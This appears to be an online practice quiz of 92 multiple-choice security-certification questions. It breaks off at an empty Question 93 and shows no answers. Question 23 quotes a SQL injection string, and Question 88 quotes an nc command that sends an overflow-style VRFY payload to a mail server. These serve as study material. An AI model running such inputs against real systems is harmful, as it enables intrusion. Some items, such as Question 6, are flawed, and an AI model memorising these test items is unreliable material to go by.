Practice Test 1-2

Description

Practice Test 1-2
Arthur Casto
Quiz by Arthur Casto, updated more than 1 year ago
Arthur Casto
Created by Arthur Casto about 4 years ago
48
0

Resource summary

Question 1

Question
An auditor recommends implementing a physical security access control that will allow a guard to isolate and screen users before they enter or exit a secure area. Which of the following would be BEST fulfill this recommendation?
Answer
  • Air Gap
  • Faraday Cage
  • Bollard
  • Mantrap

Question 2

Question
A security technician is configuring a new access switch. The switch will be managed through software that will send status reports and logging details to a central management console. Which of the following protocols should the technician configure to BEST meet these requirements? (Select TWO).
Answer
  • SSL/TLS (Secure Socket Layer/Transport Layer Security)
  • S/MIME (Secure/Multipurpose Internet Mail Extensions)
  • SNMPv3 (Simple Network Management Protocol ver 3)
  • Syslog
  • SRTP (Secure Real-Time Protocol)
  • Shibboleth

Question 3

Question
A company is deploying a file-sharing protocol across a network and needs to select a protocol for authenticating clients. Management requests that the service be configured in the most secure way possible. The protocol must also be capable of mutual authentication, and support SSO and smart card logons. Which of the following would BEST accomplish this task?
Answer
  • Store credentials in LDAP (Lightweight Directory Access Protocol).
  • Use NTLM (New Technology LAN Manager) authentication.
  • Implement Kerberos.
  • Use MSCHAP (Microsoft Challenge Handshake Authentication Protocol) authentication.

Question 4

Question
Which of the following is being described when a security professional develops and publishes a password policy specifically tailored to a company, and enforces the policy through technical means?
Answer
  • Applying vendor-specific configurations.
  • Developing regulatory frameworks.
  • Implementing security control diversity.
  • Creating security benchmarks.

Question 5

Question
Which of the following enables sniffing attacks against a switched network?
Answer
  • ARP (Address Resolution Protocol) poisoning
  • IGMP (Internet Group Management Protocol) snooping
  • IP (Internet Protocol) spoofing
  • SYN flooding

Question 6

Question
A security administrator is choosing an algorithm to generate password hashes. Which of the following would offer the BEST protection against offline brute force attacks?
Answer
  • MD5 (Message Digest 5)
  • 3DES (Triple Digital Encryption Standard)
  • RIPEMD (RACE Integrity Primitives Evaluation Message Digest)
  • SHA-1 (Secure Hashing Algorithm ver 1)

Question 7

Question
A security analyst finished drafting an official response to a security assessment report, which must be sent to the head of the auditing department. The security analyst needs to assure the head of the auditing department that the response came from the security analyst, and the contents of the response must be kept confidential. Which of the following are the last steps the security analyst should perform prior to electronically sending the message? A. Hash the message. B. Encrypt the message C. Digitally sign the message. D. Label the email as "Confidential." E. Perform key exchange with the recipient.
Answer
  • A and B
  • B and C
  • A and D
  • All of the above
  • None of the above

Question 8

Question
A company's new policy allows employees to connect to corporate email using BYOD. Since employees handle client information in their corporate email, which of the following should the company implement with BYOD? A. Enable rooting of the devices. B. Assign passwords and PINs to the devices. C. Disable remote wipe. D. Enable full-device encryption. E. Disable the devices' ability to connect to open networks. F. Allow third-party app stores.
Answer
  • A and B
  • B and C
  • B and D
  • E and F
  • None of the above.
  • All of the above.

Question 9

Question
A systems administrator is configuring a new network for TACACS+ management and authentication. Which of the following must be configured to provide authentication between the switch and the TACACS+ server?
Answer
  • 802.1x
  • SSH (Secure Shell)
  • Shared secret
  • SNMPv3 (Simple Network Management Protocol ver 3)
  • CHAP (Challenge Handshake Authentication Protocol)

Question 10

Question
University A offers an AAA-based SSO service that allows students to access all wireless and VPN services with the standard university credentials. University A wants to partner with University B to allow its students who are taking classes at University B to sign into either university's wireless network and VPN services with their home university credentials. Which of the following should be implemented to achieve the desired results?
Answer
  • RADIUS Federation
  • SAML
  • Wildcard certificates
  • OAuth 2.0
  • Reverse proxy

Question 11

Question
While browsing an external website, a human resources manager opens several links in new browser tabs to review later. After browsing for 20 minutes, a full-screen message appears in a completely new browser window with a critical error code and a help desk number to call. At the same time, an audio message plays over the laptop speaker, describing a critical error and warning that the IP address of the laptop will be locked until the critical issue is resolved. The human resources manager is unable to escape out of the error message, and the keyboard is not responsive. After alerting the security team, the human resources manager hold down the power button to turn off the laptop and then power it back on which rectifies the issue. Which of the following BEST describes the type of attack the human resources manager is experiencing?
Answer
  • Spyware
  • Ransomware
  • Adware
  • Logic bomb

Question 12

Question
During a penetration test, some servers in the network were found to be using Telnet as a remote connection protocol. Which of the following would mitigate the identified risk?
Answer
  • Disable Telnet and deploy SSH (Secure Shell).
  • Disable Telnet and deploy SFTP (Secure File Transfer Protocol).
  • Disable Telnet and deploy SNMPv3 (Simple Network Management Protocol ver 3)
  • Disable Telnet and deploy S/MIME (Secure/Multipurpose Internet Mail Extensions)

Question 13

Question
A call center company wants to implement a domain policy primarily for its shift workers. The call center has large groups with different user roles. Management wants to monitor group performance. Which of the following is the BEST solution for the company to implement?
Answer
  • Reduced failed logon attempts.
  • Mandatory password changes.
  • Increased account lockout time.
  • Time-of-day restrictions.

Question 14

Question
Which of the following BEST explains why an application team might take a VM snapshot before applying patches in the production environment?
Answer
  • To reduce the operational risk so application users can continue using the system while the patch is being applied in the production environment.
  • To reduce security risk by having a baseline against which the patched system can be compared if the system becomes compromised.
  • To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails.
  • To reduce security risk so vulnerability scans can be performed on a pre- and post-patched system and the results can be compared.

Question 15

Question
Hacktivists are most commonly motivated by:
Answer
  • curiosity.
  • notoriety.
  • financial gain.
  • political cause.

Question 16

Question
An organization's IT department announced plans to upgrade workstation operating systems to the latest version after electing to skip the prior two versions. Which of the following vulnerabilities is the organization seeking to mitigate?
Answer
  • Incompatibility issues with currently implemented software.
  • Lack of vendor support on the version currently in use.
  • Poorly defined security baselines.
  • Use of expired certificates on the network.

Question 17

Question
An analyst is part of a team that is investigating a potential breach of sensitive data at a large organization, which services the financial sector. The organization suspects a breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was MOST likely to have been utilized to exfiltrate the proprietary data?
Answer
  • Keylogger
  • Botnet
  • Crypto-malware
  • Backdoor
  • Ransomware
  • DLP (Data Loss Prevention)

Question 18

Question
Users from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors?
Answer
  • Trust model
  • Stapling
  • Intermediate CA
  • Key escrow

Question 19

Question
Which of the following controls allows a security guard to perform a post-incident review?
Answer
  • Detective
  • Preventive
  • Technical
  • Deterrent

Question 20

Question
A public announcement is made about a newly discovered, rapidly spreading virus.The security team immediately updates and applies all it's antivirus signatures. The security manager contacts the antivirus vendor support team to ask why one of the systems was infected. The vendor support team explains that a signature update is not available for this virus yet. Which of the following BEST describes this situation?
Answer
  • Race condition
  • Zero day
  • Lack of vendor support
  • Untrained users

Question 21

Question
A law office has been leasing dark fiber from a local telecommunications company to connect a remote office to company headquarters. The telecommunications company has decided to discontinue its dark fiber product and is offering an MPLS (Multi-Protocol Label Switching) connection, which the law office feels is too expensive. Which of the following is the BEST solution for the law office?
Answer
  • Remote access VPN
  • VLAN
  • VPN concentrator
  • Site-to-site VPN

Question 22

Question
Due to a configuration error, sales and marketing staff were able to access highly sensitive, commercial R&D information for a period of five days before the issue was discovered by an automated system, corrected, and flagged for review. Inspection of logs and monitoring systems by security analysts indicated that no sensitive data was accessed. Based on this scenario, which of the following should a risk manager be MOST concerned about?
Answer
  • Data exfiltration
  • Insider threat
  • Permission issues
  • Baseline deviation

Question 23

Question
Logs from an IDS alerted on a string entered into the company's website login page. The following line was pulled from the HTTP POST request. userid=bob' and 1='1&request=Submit Which of the following was attempted?
Answer
  • Reflected XSS (Cross-site Scripting)
  • Stored XSS (Cross-site Scripting)
  • Cross-site request forgery
  • SQL (Structured Query Language) injection

Question 24

Question
Students at a residence hall are reporting Internet connectivity issues. The university's network administrator configured the residence hall's network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall's network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation?
Answer
  • Router ACL's
  • BPDU guard
  • Flood guard
  • DHCP snooping

Question 25

Question
A technician has discovered a crypto-virus infection on a workstation that has access to sensitive remote resources. Which of the following is the immediate NEXT step the technician should take?
Answer
  • Determine the source of the virus that has infected the workstation.
  • Sanitize the workstation's internal drive.
  • Reimage the workstation for normal operation.
  • Disable the network connections on the workstation.

Question 26

Question
Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed?
Answer
  • Nonce
  • Salt
  • OTP (One-time Password)
  • Block cipher
  • IV (Initialization Vector)

Question 27

Question
A security engineer must install the same X.509 certification on servers in three different domains. The client application that connects to the server performs a check to ensure the certificate matches the hostname. Which of the following should the security engineer use?
Answer
  • Wildcard certificate
  • Extended validation certificate
  • Certificate chaining
  • Certificate utilizing the SAN field

Question 28

Question
Which of the following would an online retailer consider when selecting a backup facility, should there be a natural disaster that destroys its existing production datacenter?
Answer
  • Off-site backups
  • Hot site
  • Warm site
  • Cold site

Question 29

Question
An organization's Chief Information Officer (CIO) recently received an email from human resources that contained sensitive information. The CIO noticed the email was sent via unsecure means. A policy has since been put into place stating all emails must be transmitted using secure technologies. Which of the following should be implemented to address the new policy?
Answer
  • HTTPS (Hypertext Terminal Protocol Secure)
  • SMTP (Simple Mail Transfer Protocol)
  • TLS (Transport Layer Security)
  • SFTP (Secure File Transfer Protocol)

Question 30

Question
A manufacturing company updates a policy that instructs employees not to enter a secure area in groups and require each employee to swipe their badge to enter the area. When employees continue to ignore the policy, a mantrap is installed. Which of the following BEST describe the controls that were implemented to address this issue? (Select TWO)
Answer
  • Detective
  • Administrative
  • Deterrent
  • Physical
  • Corrective

Question 31

Question
A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment access provisions of its services. Which of the following BEST represents the required cloud deployment model?
Answer
  • SaaS (Software as a Service)
  • IaaS (Infrastructure as a Service)
  • MaaS (Monitoring as a Service)
  • Hybrid
  • Private

Question 32

Question
A security administrator wants to audit the login page of a newly developed web application to determine if default accounts have been disabled. Which of the following is BEST suited to perform this audit?
Answer
  • Password cracker
  • Rainbow table
  • Protocol analyzer
  • Banner grabbing

Question 33

Question
Performing a penetration test without any advance knowledge of what will be found is an example of a:
Answer
  • White box test
  • Gray box test
  • Black box test
  • Sandbox test

Question 34

Question
A security analyst is monitoring the network and observes unusual traffic coming from a host on the LAN. Using a network monitoring tool, the analyst observes the following information (see image). After ten seconds, some of the computers shown in the IP Dst field start to exhibit the same behavior and immediately make multiple outbound connections attempts. Based on the observed behavior, which of the following the MOST likely the cause?
Answer
  • Users are running port scans on the network.
  • An outside malicious user is performing a MitM attack.
  • An amplified DDos attack is in progress.
  • A worm is attacking the network.
  • A race condition is being leveraged.

Question 35

Question
A technician wants to perform network enumeration against a subnet in preparation for an upcoming assessment. During the first phase, the technician performs a ping sweep. Which of the following scan types did the technician use?
Answer
  • Non-intrusive
  • Intrusive
  • Credentialed
  • Passive

Question 36

Question
A developer wants to use an open source, third-party plug-in. The developer downloads the plug-in from the provider's website and from a mirror site that runs the files through an integrity-checking hash. The output of each file is shown below: fileA: BA411c782AD521740123456789ABCDEF fileB: BA411c782AD521740123456789ABCDEF Which of the following statements BEST summarizes what conclusion the developer can draw from the above results?
Answer
  • The files have both been compromised because the numeric and letter sequence indicates an error.
  • The integrity checksum is MD5 and cannot be assumed reliable.
  • Given the output, the developer can assume there is no integrity compromise.
  • The MD5 and SHA-1 checksums match, so the files have not been compromised.

Question 37

Question
A security analyst is checking the bash command history on a Linux host that was involved in a data breach. The data breach stemmed from the Linux host running a series of commands against a web server on the internal network, which exploited a vulnerability in an unpatched, outdated Apache module. Given this scenario, which of the following commands might the analyst find in the bash command history for banner grabbing? (Select TWO).
Answer
  • arp
  • tracert
  • nmap
  • telnet
  • nslookup
  • grep

Question 38

Question
A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur?
Answer
  • Impersonation
  • Credential harvesting
  • Password cracking
  • Lateral movement

Question 39

Question
A security technician has been the task of preserving emails that are potentially involved in a dispute between a company and a contractor. Which of the following BEST describes this forensic concept?
Answer
  • Legal hold
  • Chain of custody
  • Order if volatility
  • Data aquisition

Question 40

Question
A security analyst is hardening a large-scale wireless network. The primary requirements are the following: - Must use authentication through EAP-TLS certificates - Must use an AAA server - Must use the most secure encryption protocol Given these requirements, which of the following should the analyst implement and recommend? (Select TWO).
Answer
  • 802.1x
  • 802.3
  • LDAP (Lightweight Directory Access Protocol)
  • TKIP (Temporal Key Integrity Protocol)
  • CCMP (Counter-Mode/CBC-Mac Protocol)
  • WPA2-PSK (WiFi Protected Access 2 - Preshared Key)

Question 41

Question
Which of the following is a penetration tester performing when running an SMB (Server Message Block) NULL session scan of a host to determine valid usernames and share names?
Answer
  • Credentialed vulnerability scan
  • Passive scan
  • Non-credentialed scan
  • Non-intrusive vulnerability testing
  • Penetration testing

Question 42

Question
Which of the following encryption algorithms is used primarily to secure data at rest?
Answer
  • AES (Advanced Encryption Standard)
  • SSL (Secure Sockets Layer)
  • TLS (Transport Layer Security)
  • RSA (Rivest, Shamir, & Adleman)

Question 43

Question
A security engineer implements multiple technical measures to secure an enterprise network. The engineer also works with the Chief Information Officer (CIO) to implement policies to govern user behavior. Which of the following is the security engineer executing?
Answer
  • Baselining
  • Mandatory access controls
  • Control diversity
  • System hardening

Question 44

Question
A security administrator is reviewing the following firewall configuration after receiving reports that users are unable to connect to remote websites: 10 PERMIT FROM:ANY TO:ANY PORT:80 20 PERMIT FROM: ANY TO:ANY PORT 443 30 DENY FROM:ANY TO:ANY PORT:ANY Which of the following is the MOST secure solution the security administrator can implement to fix this issue?
Answer
  • Add the following rule to the firewall: 5 PERMIT FROM: ANY TO:ANY PORT:53
  • Replace rule number 10 with the following rule: 10 PERMIT FROM:ANY TO:ANY PORT:22
  • Insert the following rule in the firewall: 25 PERMIT FROM:ANY TO:ANY PORTS:ANY
  • Remove the following rule from the firewall: 30 DENY FROM:ANY TO:ANY PORT:ANY

Question 45

Question
Which of the following BEST explains why sandboxing is a best practice for testing software from an untested vendor prior to an enterprise deployment?
Answer
  • It allows the software to run in an unconstrained environment with full network access
  • It eliminates the possibility of privilege escalation attacks against the local VM host
  • It facilitates the analysis of possible malware by allowing it to run until resources are exhausted
  • It restricts access of the software to a contained logical space and limits possible damage

Question 46

Question
A systems administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites?
Answer
  • Extended domain validation
  • TLS (Transport Layer Security) host certificate
  • OCSP (Online Certificate Status Protocol) stapling
  • Wildcard certificate

Question 47

Question
A security analyst is reviewing the password policy for a service account that is used for a critical network service. The password policy for this account is as follows: Enforce password history: 3 passwords remembered Maximum password age: 30 days Minimum password age: 0 days Complexity requirements: At least 1 special character, 1 uppercase Minimum password length: 7 characters Lockout duration: 1 day Lockout threshold: 5 failed attempts in 15 minutes Which of the following adjustments would be MOST appropriate for the service account?
Answer
  • Disable account lockouts
  • Set the maximum password age to 15 days
  • Set the minimum password age to seven days
  • Increase password length to 18 characters

Question 48

Question
While investigating a virus infection, a security analyst has discovered the following on an employee laptop: - Multiple folders containing a large number of newly released movies and music files - Proprietary company files - A large amount of PHI data - Unapproved FTP software - Documents that appear to belong to a competitor Which of the following should the analyst do FIRST?
Answer
  • Contact the legal and compliance department for guidance.
  • Delete the files, remove the FTP software, and notify management.
  • Back up the files and return the device to the user.
  • Wipe and reimage the device.

Question 49

Question
A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. The session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?
Answer
  • Domain hijacking
  • Injection
  • Buffer overflow
  • Privilege escalation

Question 50

Question
A security analyst is assessing a small company's internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (Select TWO)
Answer
  • Compare configurations against platform benchmarks.
  • Confirm adherence to the company's industry-specific regulations
  • Review the company's current security baseline.
  • Verify alignment with policy related to regulatory compliance.
  • Run an exploitation framework to confirm vulnerabilities.

Question 51

Question
A company that processes sensitive information has implemented a BYOD (Bring Your Own Device) policy and an MDM (Mobile Device Management) solution to secure sensitive data that is processed by corporate and personally owned mobile devices. Which of the following should the company implement to prevent sensitive data from being stored on mobile devices?
Answer
  • VDI (Virtual Desktop Infrastructure)
  • Storage segmentation
  • Containerization
  • USB OTG
  • Geofencing

Question 52

Question
A Chief Information Security Officer (CISO) asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO?
Answer
  • VPN
  • PaaS ( Platform as a Service)
  • IaaS (Infrastucture as a Service)
  • VDI (Virtual Desktop Infrastructure)

Question 53

Question
An organization has hired a new remote workforce. Many new employees are reporting that they are unable to access the shared network resources while traveling. They need to be able to travel to and from different locations on a weekly basis. Shared offices are retained at the headquarters location. The remote workforce will have identical file and system access requirements, and must also be able to log in to the headquarters location remotely. Which of the following BEST represent how the remote employees should have been set up initially? (Select TWO)
Answer
  • User-based access controls
  • Shared accounts
  • Group-based access controls
  • Roaming profiles
  • Individual accounts
  • Location based-policies

Question 54

Question
During a lessons learned meeting regarding a previous incident, the security team receives a follow-up action item with the following requirements: - Allow authentication from within the United States anytime - Allow authentication if the user is accessing email or a shared file system. - Do not allow authentication if the AV program is two days out of date - Do not allow authentication if the location of the device is in two specific countries Given the requirements, which of the following mobile deployment authentication types is being utilized?
Answer
  • Geofencing authentication
  • Two-factor authentication
  • Context-aware authentication
  • Biometric authentication

Question 55

Question
A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?
Answer
  • arp - s 192.168.1.1 00-3a-d1-fa-b1-06
  • dig - x@192.168.1.1 mypc.comptia.com
  • nmap - A - T4 192.168.1.1
  • tcpdump - lnv host 192.168.1.1 or either 00:3a:d1:fa:b1:06

Question 56

Question
Which of the following is the BEST reason for salting a password hash before it is stored in a database?
Answer
  • To prevent duplicate values from being stored
  • To make the password retrieval process very slow
  • To protect passwords from being saved in readable format
  • To prevent users from using simple passwords for their access credentials

Question 57

Question
An organization wants to utilize a common, Internet-based third-party provider for authorization and authentication. The provider uses a technology based on OAuth 2.0 to provide required services. To which of the following technologies is the provider referring?
Answer
  • OpenID Connect
  • SAML
  • XACML
  • LDAP

Question 58

Question
A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using?
Answer
  • Escalation of privilege
  • SQL Injection
  • Active reconnaissance
  • Proxy server

Question 59

Question
Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator? (Select TWO)
Answer
  • An attacker could potentially perform a downgrade attack.
  • The connection is vulnerable to resource exhaustion.
  • The integrity of the data could be at risk.
  • The VPN concentrator could revert to L2TP.
  • The IPSec payload reverted to 16-bit sequence numbers.

Question 60

Question
Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time?
Answer
  • Security awareness training
  • Antivirus
  • Firewalls
  • Intrusion detection system

Question 61

Question
A web developers improves client access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements?
Answer
  • SAML (Security Assertions Markup Language)
  • LDAP (Lightweight Directory Access Protocol)
  • OAuth (Open Authorization)
  • Shibboleth

Question 62

Question
A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed?
Answer
  • Non-intrusive
  • Authenticated
  • Credentialed
  • Active

Question 63

Question
A security analyst is updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded? (Select TWO)
Answer
  • The MTTR (mean time to repair) is faster.
  • The MTTR (mean time to repair) is slower.
  • The RTO (Recovery Time Objective) has increased.
  • The RTO (Recovery Time Objective) has decreased.
  • The MTTF (Mean Time to Failure) has increased.
  • The MTTF (Mean Time to Failure) has decreased.

Question 64

Question
The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is receive reports that users are experiencing the following error when attempting to log in to their previous system: Logon Failure: Access Denied Which of the following can cause this issue?
Answer
  • Permission issues
  • Access violations
  • Certificate issues
  • Misconfigured devices

Question 65

Question
Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO)
Answer
  • Public key
  • Shared key
  • Elliptic curve
  • MD5 (Message Digest 5)
  • Private key
  • DES (Digital Encryption Standard)

Question 66

Question
Which of the following are used to increase the computing time it takes to brute force a password using an offline attack? (Select TWO)
Answer
  • XOR (Exclusive Or)
  • PBKDF2 (Password-based Key Derivation Function 2)
  • bcrypt
  • HMAC (Hashed Message Authentication Code)
  • RIPEMD (RACE Integrity Primitives Evaluation Message Digest)

Question 67

Question
Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal?
Answer
  • PIN
  • Security question
  • Smart card
  • Passphrase
  • CAPTCHA

Question 68

Question
An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using?
Answer
  • SaaS (Software as a Service)
  • CASB (Cloud Access Security Broker)
  • IaaS (Infrastucture as a Service)
  • PaaS (Platform as a Service)

Question 69

Question
Which of the following is commonly done as part of a vulnerability scan?
Answer
  • Lessons learned
  • Recovery
  • identification
  • Preparation

Question 70

Question
A user needs to send sensitive information to a colleague using PKI. Which of the following concepts apply when a sender encrypts the message hash with the sender's private key? (Select TWO)
Answer
  • Non-repudiation
  • Email content encryption
  • Steganography
  • Transport security
  • Message integrity

Question 71

Question
A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch: C:\Window\SysWOW64\user32.dll WARNING - hash mismatch: C:\Window\SysWOW64\kernel32.dll Based solely on the above information, which of the following types of malware is MOST likely installed on the system?
Answer
  • Rootkit
  • Ransomware
  • Trojan
  • Backdoor

Question 72

Question
As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this?
Answer
  • Require the use of an eight-character PIN.
  • Implement containerization of company data.
  • Require annual AUP (Acceptable Use Policy) sign-off.
  • Use geofencing tools to unlock devices while on the premises.

Question 73

Question
A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause?
Answer
  • Insufficient key bit length
  • Weak cipher suite
  • Unauthenticated encryption method
  • Poor implementation

Question 74

Question
An incident involving a workstation that is potentially infected with a virus has occurred. The workstation may have sent confidential data to an unknown internet server. Which of the following should a security analyst do FIRST?
Answer
  • Make a copy of everything in memory on the workstation
  • Turn off the workstation
  • Consult the information security policy
  • Run a virus scan

Question 75

Question
Which of the following BEST describes an important security advantage yielded by implementing vendor diversity?
Answer
  • Sustainability
  • Homogeneity
  • Resiliency
  • Configurability

Question 76

Question
A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed?
Answer
  • Removing the hard drive from its enclosure
  • Using software to repeatedly rewrite over the disk space
  • Using Blowfish encryption on the hard drives
  • Using magnetic fields to erase the data

Question 77

Question
A manager wants to distribute a report to several other managers with the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE)
Answer
  • S/MIME (Secure/Multipurpose Internet Mail Extensions)
  • SSH (Secure Shell)
  • SNMPv3 (Simple Network Management Protocol ver 3)
  • FTPS (File Transfer Protocol Secure)
  • SRTP (Secure Real-Time Protocol)
  • HTTPS (Hypertext Terminal Protocol Secure)
  • LDAPS (Lightweight Directory Access Protocol Secure)

Question 78

Question
A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows: Permissions User Group File -rwxrw-r--+ Admins Admins changes Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file?
Answer
  • The SELinux mode on the server is set to "enforcing."
  • The SELinux mode on the server is set to "permissive."
  • An FACL (File System Access Control List) has been added to the permissions for the file.
  • The admins group does not have adequate permissions to access the file.

Question 79

Question
A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet: c:\nslookup -querytype=MX comptia.org Server: Unknown Address: 198.51.100.45 comptia.org MX preference=10, mail exchanger = 92.68.102.33 comptia.org MX preference=20, mail exchanger = exchg1.comptia.org exchg1.comptia.org internet address = 192.168.102.67 Which of the following should the penetration tester conclude about the command output?
Answer
  • The public/private views on the Comptia.org DNS servers are misconfigured.
  • Comptia.org is running an older mail server, which may be vulnerable to exploits.
  • The DNS SPF records have not been updated for Comptia.org.
  • 192.168.102.67 is a backup mail server that may be more vulnerable to attack.

Question 80

Question
A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0) Threat actor: any remote user of the web server Confidence: certain Recommendation: apply vendor patches Which of the following actions should the security analyst perform FIRST?
Answer
  • Escalate the issue to senior management.
  • Apply organizational context to the risk rating.
  • Organize for urgent out-of-cycle patching.
  • Exploit the server to check whether it is a false positive.

Question 81

Question
Company A agrees to provide perimeter protection, power, and environmental support with measurable goals for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described?
Answer
  • Service level agreement
  • Memorandum of understanding
  • Business partner agreement
  • Interoperability agreement

Question 82

Question
A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk?
Answer
  • Implement a mobile data loss agent on the devices to prevent any user manipulation with the contact information.
  • Restrict screen capture features on the devices when using the custom application and the contact information.
  • Restrict contact information storage data flow so it is only shared with the customer application.
  • Require complex passwords for authentication when accessing the contact information.

Question 83

Question
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?
Answer
  • Cloud-based antivirus solution, running as local admin, with push technology for definition updates
  • Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all client computing needs
  • Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs
  • Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed

Question 84

Question
An organization has several production-critical SCADA (System Control and Data Acquisition) supervisory systems that cannot follow the normal 30- day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software?
Answer
  • Configure a firewall with deep packet inspection that restricts traffic to the systems.
  • Configure a separate zone for the systems and restrict access to known ports.
  • Configure the systems to ensure only necessary applications are able to run.
  • Configure the host firewall to ensure only the necessary applications have listening ports.

Question 85

Question
An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?
Answer
  • Use a protocol analyzer to reconstruct the data and implement a web-proxy.
  • Deploy a web-proxy and then blacklist the IP on the firewall.
  • Deploy a web-proxy and implement IPS at the network edge.
  • Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

Question 86

Question
Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack?
Answer
  • Key risk indicators
  • Lessons learned
  • Recovery point objectives
  • Tabletop exercise

Question 87

Question
A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST?
Answer
  • Survey threat feeds from services inside the same industry.
  • Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic.
  • Conduct an internal audit against industry best practices to perform a qualitative analysis.
  • Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

Question 88

Question
During a routine vulnerability assessment, the following command was successful: echo "vrfy 'perl -e 'print "hi" x 500 ' ' " | nc www.company.com 25 Which of the following vulnerabilities is being exploited?
Answer
  • Buffer overflow directed at a specific host MTA
  • SQL injection directed at a web server
  • Cross-site scripting directed at www.company.com
  • Race condition in a UNIX shell script

Question 89

Question
A company offers SaaS, maintaining all customers' credentials and authenticating locally. Many large customers have requested the company offer some form of federation with their existing authentication infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations?
Answer
  • Implement SAML so the company's services may accept assertions from the customers' authentication servers.
  • Provide customers with a constrained interface to manage only their users' accounts in the company's active directory server.
  • Provide a system for customers to replicate their users' passwords from their authentication service to the company's.
  • Use SOAP (Simple Object Access Protocol) calls to support authentication between the company's product and the customers' authentication servers.

Question 90

Question
A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now?
Answer
  • Agile
  • Waterfall
  • Scrum
  • Spiral

Question 91

Question
Following the successful response to a data-leakage incident, the incident team lead facilitates in an exercise that focuses on continuous improvement of the organization's incident response capabilities. Which of the following activities has the incident team lead executed?
Answer
  • Lessons learned review
  • Root cause analysis
  • Incident audit
  • Corrective action exercise

Question 92

Question
A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform:
Answer
  • a gray-box penetration test.
  • a risk analysis.
  • a vulnerability assessment.
  • an external security audit.
  • a red team exercise.

Question 93

Question
